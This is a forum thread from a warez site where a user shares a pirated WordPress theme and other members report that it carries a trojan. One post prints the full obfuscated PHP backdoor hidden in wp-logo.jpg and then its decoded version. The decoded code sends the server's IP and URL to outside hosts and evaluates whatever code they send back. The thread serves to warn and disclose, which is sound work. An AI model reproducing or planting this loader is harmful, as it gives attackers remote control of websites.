31.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

06-17-2014, 05:00 AM (This post was last modified: 06-21-2014 09:15 AM by pretheme-vip.)
Post: #1
PRO Business v1.0 – Themeforest Responsive Multi-Purpose Theme
[Image: NbhCuOJ1403251292.jpg]
Responsive – This theme is
responsive to give a perfect user experience on all devices Boxed or
fullwidth layout – This can be set globally or even per page! Built on
Twitter Bootstrap – Pro Business uses Twitter Bootstrap.
Demo :

http://themeforest.net/item/pro-business...me/7644084


Download Link:
http://Flagged as VIRUS SPAM SITE/3ya63zzc87m5/themeforest-7644084-pro-business-responsive-multipurpose-theme.rar.html
Scan : https://www.virustotal.com/ro/file/4fe08.../analysis/
06-17-2014, 06:59 AM (This post was last modified: 06-17-2014 07:08 AM by catalinux.)
Post: #2
RE:
Thanks for the trojan (wp-logo.jpg) ! Watch out guys !

<?php eval(base64_decode('DQp0cnkgew0KICAgICRzZXJ2ZXJVcmwgPSBhcnJheSgNCiAgICAgICAgIjk2​d24uY29tL3RyYW5zaXQucGhwIiwNCiAgICAgICAgIjY0dGouY29tL3RyYW5zaXQucGhwIiwNCiAgICAg​ICAgInVnbzMuY29tL3RyYW5zaXQucGhwIiwNCiAgICApOw0KDQogICAgJGRvbWFpblBhY2tWZXJzaW9u​ID0gMTsNCiAgICBpZihhcnJheV9rZXlfZXhpc3RzKCdTRVJWRVJfQUREUicsICRfU0VSVkVSKSkNCiAg​ICAgICAgJGlwID0gJF9TRVJWRVJbJ1NFUlZFUl9BRERSJ107DQogICAgZWxzZWlmKGFycmF5X2tleV9l​eGlzdHMoJ0xPQ0FMX0FERFInLCAkX1NFUlZFUikpDQogICAgICAgICRpcCA9ICRfU0VSVkVSWydMT0NB​TF9BRERSJ107DQogICAgZWxzZWlmKGFycmF5X2tleV9leGlzdHMoJ1NFUlZFUl9OQU1FJywgJF9TRVJW​RVIpKQ0KICAgICAgICAkaXAgPSBnZXRob3N0YnluYW1lKCRfU0VSVkVSWydTRVJWRVJfTkFNRSddKTsN​CiAgICBlbHNlIHsNCiAgICAgICAgaWYoc3RyaXN0cihQSFBfT1MsICdXSU4nKSkgew0KICAgICAgICAg​ICAgJGlwID0gZ2V0aG9zdGJ5bmFtZShwaHBfdW5hbWUoIm4iKSk7DQogICAgICAgIH0gZWxzZSB7DQog​ICAgICAgICAgICAkaWZjb25maWcgPSBzaGVsbF9leGVjKCcvc2Jpbi9pZmNvbmZpZyBldGgwJyk7DQog​ICAgICAgICAgICBwcmVnX21hdGNoKCcvYWRkcjooW1xkXC5dKykvJywgJGlmY29uZmlnLCAkbWF0Y2gp​Ow0KICAgICAgICAgICAgJGlwID0gJG1hdGNoWzFdOw0KICAgICAgICB9DQogICAgfQ0KICAgICRjdXJy​ZW50VXJsID0gcnRyaW0oJ2h0dHAnLihlbXB0eSgkX1NFUlZFUlsnSFRUUFMnXSk/Jyc6J3MnKS4nOi8vJy4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10s​ICcvJyk7DQogICAgJGRhdGEgPSBhcnJheSgNCiAgICAgICAgInVybCIgICAgICAgICAgICAgICA9PiAk​Y3VycmVudFVybCwNCiAgICAgICAgImlwIiAgICAgICAgICAgICAgICA9PiAkaXAsDQogICAgICAgICJk​b21haW5QYWNrVmVyc2lvbiIgPT4gJGRvbWFpblBhY2tWZXJzaW9uLA0KICAgICAgICAiZmFpbGVkRG9t​YWlucyIgICAgID0+IGFycmF5KCksDQogICAgKTsNCiAgICAkZmFpbGVkUmVxdWVzdCA9IHRydWU7DQog​ICAgJGZhaWxDb3VudGVyID0gMDsNCiAgICAkc29ja1N1Y2Nlc3MgPSBmYWxzZTsNCiAgICAkdXJsS2V5​ID0gcmFuZCgwLCBjb3VudCgkc2VydmVyVXJsKS0xKTsNCiAgICAkc3ViRG9tYWluID0gcmFuZCgwLCAx​MCk7DQogICAgd2hpbGUgKCEkc29ja1N1Y2Nlc3MpIHsNCiAgICAgICAgJHJlc3VsdCA9ICIiOw0KICAg​ICAgICAkdXJsID0gcGFyc2VfdXJsKCJodHRwOi8vYXBpIi4kc3ViRG9tYWluLiIuIi4kc2VydmVyVXJs​WyR1cmxLZXldKTsNCiAgICAgICAgJGhvc3QgPSAkdXJsWyJob3N0Il07DQogICAgICAgICRwYXRoID0g​ICghZW1wdHkoJHVybFsicGF0aCJdKSkgPyAkdXJsWyJwYXRoIl0gOiAnJzsNCiAgICAgICAgJGZwID0g​ZnNvY2tvcGVuKCRob3N0LCA4MCwgJGVycm5vLCAkZXJyc3RyLCAxKTsNCiAgICAgICAgJGRhdGFRdWVy​eT1odHRwX2J1aWxkX3F1ZXJ5KCRkYXRhKTsNCiAgICAgICAgaWYoJGZwKXsNCiAgICAgICAgICAgIGZw​dXRzKCRmcCwgIlBPU1QgJHBhdGggSFRUUC8xLjEiLlBIUF9FT0wpOw0KICAgICAgICAgICAgZnB1dHMo​JGZwLCAiSG9zdDogJGhvc3QiLlBIUF9FT0wpOw0KICAgICAgICAgICAgZnB1dHMoJGZwLCAiQ29udGVu​dC10eXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQiLlBIUF9FT0wpOw0KICAgICAg​ICAgICAgZnB1dHMoJGZwLCAiQ29udGVudC1sZW5ndGg6ICIuc3RybGVuKCRkYXRhUXVlcnkpLlBIUF9F​T0wpOw0KICAgICAgICAgICAgZnB1dHMoJGZwLCAiQ29ubmVjdGlvbjogY2xvc2UiLlBIUF9FT0wuUEhQ​X0VPTCk7DQogICAgICAgICAgICBmcHV0cygkZnAsICRkYXRhUXVlcnkpOw0KICAgICAgICAgICAgd2hp​bGUoIWZlb2YoJGZwKSkgJHJlc3VsdCAuPSBmZ2V0cygkZnAsIDEyOCk7DQogICAgICAgICAgICAkY29k​ZSA9IHN1YnN0cigkcmVzdWx0LDksMyk7DQogICAgICAgICAgICBmY2xvc2UoJGZwKTsNCiAgICAgICAg​ICAgIGlmIChpc19udW1lcmljKCRjb2RlKSAmJiAkY29kZT09PSIyMDAiKSB7DQogICAgICAgICAgICAg​ICAgYnJlYWs7DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICAgICAgaWYgKCRmYWlsZWRSZXF1​ZXN0KSB7DQogICAgICAgICAgICAkZmFpbENvdW50ZXIrKzsNCiAgICAgICAgICAgICRkYXRhWydmYWls​ZWREb21haW5zJ11bXSA9ICRzZXJ2ZXJVcmxbJHVybEtleV07DQogICAgICAgICAgICBhcnJheV9zcGxp​Y2UoJHNlcnZlclVybCwkdXJsS2V5LCAxKTsNCiAgICAgICAgICAgIGlmICghZW1wdHkoJHNlcnZlclVy​bCkgJiYgJGZhaWxDb3VudGVyPDIpDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgJHN1YkRv​bWFpbiA9IHJhbmQoMCwgMTApOw0KICAgICAgICAgICAgICAgICR1cmxLZXkgPSByYW5kKDAsIGNvdW50​KCRzZXJ2ZXJVcmwpLTEpOw0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgZWxzZQ0KICAgICAgICAg​ICAgICAgIGJyZWFrOw0KICAgICAgICB9DQogICAgfQ0KICAgIGlmICghZW1wdHkoJHJlc3VsdCkgJiYg​c3RycG9zKCRyZXN1bHQsICdyZXN1bHQ9JykhPT1mYWxzZSkNCiAgICB7DQogICAgICAgICR0ZW1wID0g​ZXhwbG9kZSgncmVzdWx0PScsICRyZXN1bHQsIDIpOw0KICAgICAgICBpZihpc3NldCgkdGVtcFsxXSkp​ew0KICAgICAgICAgICAgQGV2YWwoJHRlbXBbMV0pOw0KICAgICAgICB9DQogICAgfQ0KfSBjYXRjaCAo​RXhjZXB0aW9uICRlKSB7DQoNCn0NCg=='));?>

And the translation:

try {
$serverUrl = array(
"96wn.com/transit.php",
"64tj.com/transit.php",
"ugo3.com/transit.php",
);

$domainPackVersion = 1;
if(array_key_exists('SERVER_ADDR', $_SERVER))
$ip = $_SERVER['SERVER_ADDR'];
elseif(array_key_exists('LOCAL_ADDR', $_SERVER))
$ip = $_SERVER['LOCAL_ADDR'];
elseif(array_key_exists('SERVER_NAME', $_SERVER))
$ip = gethostbyname($_SERVER['SERVER_NAME']);
else {
if(stristr(PHP_OS, 'WIN')) {
$ip = gethostbyname(php_uname("n"));
} else {
$ifconfig = shell_exec('/sbin/ifconfig eth0');
preg_match('/addr:([\d\.]+)/', $ifconfig, $match);
$ip = $match[1];
}
}
$currentUrl = rtrim('http'.(empty($_SERVER['HTTPS'])?'':'s').'://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'], '/');
$data = array(
"url" => $currentUrl,
"ip" => $ip,
"domainPackVersion" => $domainPackVersion,
"failedDomains" => array(),
);
$failedRequest = true;
$failCounter = 0;
$sockSuccess = false;
$urlKey = rand(0, count($serverUrl)-1);
$subDomain = rand(0, 10);
while (!$sockSuccess) {
$result = "";
$url = parse_url("http://api".$subDomain.".".$serverUrl[$urlKey]);
$host = $url["host"];
$path = (!empty($url["path"])) ? $url["path"] : '';
$fp = fsockopen($host, 80, $errno, $errstr, 1);
$dataQuery=http_build_query($data);
if($fp){
fputs($fp, "POST $path HTTP/1.1".PHP_EOL);
fputs($fp, "Host: $host".PHP_EOL);
fputs($fp, "Content-type: application/x-www-form-urlencoded".PHP_EOL);
fputs($fp, "Content-length: ".strlen($dataQuery).PHP_EOL);
fputs($fp, "Connection: close".PHP_EOL.PHP_EOL);
fputs($fp, $dataQuery);
while(!feof($fp)) $result .= fgets($fp, 128);
$code = substr($result,9,3);
fclose($fp);
if (is_numeric($code) and& $code==="200") {
break;
}
}
if ($failedRequest) {
$failCounter++;
$data['failedDomains'][] = $serverUrl[$urlKey];
array_splice($serverUrl,$urlKey, 1);
if (!empty($serverUrl) and& $failCounter<2)
{
$subDomain = rand(0, 10);
$urlKey = rand(0, count($serverUrl)-1);
}
else
break;
}
}
if (!empty($result) and& strpos($result, 'result=')!==false)
{
$temp = explode('result=', $result, 2);
if(isset($temp[1])){
@eval($temp[1]);
}
}
} catch (Exception $e) {

}

Report:

https://www.virustotal.com/ro/file/9307b...402952695/
06-17-2014, 07:52 AM
Post: #3
RE:
Has anyone checked any of the other WP themes Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)-vip has shared?
06-17-2014, 08:27 AM
Post: #4
RE:
I will when I have time. It's required a deeper looking...
06-17-2014, 09:40 AM
Post: #5
RE:
Oh my! I downloaded one theme from one of his shares and uploaded it to one of my test sites...
Thanks for the heads up!
20.gif
06-17-2014, 09:49 AM (This post was last modified: 06-17-2014 09:50 AM by Malice.)
Post: #6
RE:
I have scanned 3 of his Themes and guess what? All three were infected! Seeing I just picked three of his themes at random and they happen to be infected I would say it is safe to assume all of the themes he has shared on here are also infected. If you have installed one of his themes in the past I highly recommend uninstalling it immediately! I feel terrible for anyone who may have used one of his themes for a clients website.... could completely ruin their reputation. This is a perfect example as to why I NEVER install themes found on here and only use ones I purchase especially for clients. Most of the ones I have downloaded are infected. MODS please ban this dirtbag and his IP! +5 Rep for the first person to call this loser out
always +REP those who help you, it's the least you could do.
06-17-2014, 10:09 AM (This post was last modified: 06-17-2014 10:12 AM by PinayXXX.)
Post: #7
RE:
He has shared a lot of themes already and I hope that those people who are using it should be able to read this. And what happened with the rule about posting the scan results of uploads... I know that it is still the responsibility of the downloader to check on their end if a theme is infected or not but it does not hurt to at least give VT results even-though it is not a hundred percent accurate (as they say).
06-17-2014, 10:10 AM (This post was last modified: 06-17-2014 10:11 AM by Dpet102.)
Post: #8
RE:
I've been posting tons of mirrors for pre-themevip shares. Just look at the share history, you'll see for yourself. Mind you, my mirrors are found from different sources, so do your due diligence in checking the themes when downloading.

Also, it seems pre-themevip got pissed off with my mirrors, and posted comments such as the one below. Seems like this doosh is passing along infected files. Here's the message.

"Flagged as VIRUS SPAM SITE is best file host
I think we not need Mirrors link"

IP BAN REQUESTED.
06-17-2014, 02:29 PM
Post: #9
RE:
@Flagged as VIRUS SPAM SITE (Do NOT CLICK!!!)-vip all your posts are old themes and full of virus stop posting stuff from shitmafia/wplocker/themelock/scriptmasters.me/ or files from user makarov2205 aka barry_luise
06-17-2014, 02:47 PM
Post: #10
RE:
indeed trojan (wp-logo.jpg).
78.gif




30.gif